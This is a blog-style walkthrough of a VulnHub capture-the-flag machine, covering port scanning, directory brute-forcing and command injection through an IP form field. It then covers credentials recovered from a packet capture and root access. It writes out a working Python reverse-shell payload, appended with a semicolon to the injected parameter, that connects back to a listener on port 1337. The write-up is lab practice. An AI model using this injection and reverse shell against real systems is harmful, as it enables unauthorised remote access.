After downloading the machine I just had to open it with VMWare, as an FYI, it is set on Bridged by default, you can change this in the network settings though.
First things first, performed an nmap scan as usual, at the first result it showed all ports closed, so decided to go a bit deeper and scan all the 65535 ports, after a while (yeah, I know) the report showed only 1 port open, tcp port 33447 running Apache.
It is worth to notice the /Challenge attached in the nmap report. We will see more of that later. In the meantime, the main site looks like this:
Not much to see, decided to check the page source looking for some hints and at the bottom of the page there was some hexa code attached:
Which decoded turns into a base64 code:
which turns into wow.jpg
Decided to navigate to the common images folder /images/ and there it was the wow.jpg, downloaded it and after checking it with strings and exiftool didn't show anything interesting.
Remember that /Challenge/ folder? Yeah, about time to double check it.
We are presented with a charming message:
I tried some SQLI but it seems is not vulnerable. Later after I figured this form has default credentials that are available to anyone. Anyways...
At this point nothing much to keep moving, decided to fire up Dirbuster looking for some new folders to sniff around and after a while, it discovered 4 new files under the /Challenge/ directory:
- protected_page.php shows nothing as I'm not logged in.
- hacked.php shows you a form to put an ID, tried few things in this one, nothing worked.
- cake,php aparently only contains a message, but if you take a look at the page title, it shows "/Magic_Box" which seems to be another path.
I gave Dirbuster another round (one of my favorite tools) and it discovered few new paths, /Magic_Box was indeed another path:
- low.php showed absolutely nothing (blank page)
- tails.php asks for a key to open the "Magical Doors"
- command.php seems very interesting.
Checking the command.php it shows an interesting message and it also has a form to submit an IP address, however, the response was always the same, so decided to check the response in the background using Burpsuite, the application has the IP parameter as seen:
After reading about separating commands with semicolon (;) in this article:
I decided to try it here and wait for the response:
Next step to try is obtaining a reverse shell making use of this vulnerability to execute commands. After researching about reverse shell, I tried a few, without luck, after more research I came up with this code which worked smoothly, giving me access to the system, of course, a netcat listener is required before:
;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.182.128",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'&submit=submit
After sniffing aroun in the /home/ folder I found 2 users in the system:
Decided to continue looking for literally ANYTHING, after a while I found a folder in the / called /s.bin wich had a file named "investigate.php"
Opening this file contains the message: "Now you have to behave like an investigator to catch the culprit\n";
After taking a break, went back to check for more hidden files in the filesystem, checking one by one for any weird file/folder that could give some extra help, in the process, found a folder in the /sbin/ directory named "/sbin/raw_vs_isi", this folder contained a file "hint.pcapng".
pcapng is a dump file that is possible to open with WireShark, it looked something like this:
A lot of noise in the exchange, after a while reading of Wireshark filters (I'm not an expert on it) I gave this one a try to only see the destination and source between port 1337:
tcp.dstport == 1337 or tcp.srcport == 1337
After applying it, it only displayed the communication between .46 and .44, following the TCP Stream, it had a curious message behing:
It makes mention to the user that I already have by sniffing directories, saman, it also says that he is known by the alias of 1337hax0r, decided to try to sudo su with these credentials and lucky me, it worked fine, didn't have to escalate privileges looking for kernel vulnerabilities or so.
Now, all I had to do was capture the flag.txt located in the /root/ folder:
There it is. After finishing my OSCP certification I wanted to have my hands dirty with some good and safe environments to play with, thanks to +VulnHub that is possible.
I was stuck for a while, a lot of frustration but it was worth it :)
Thanks for reading.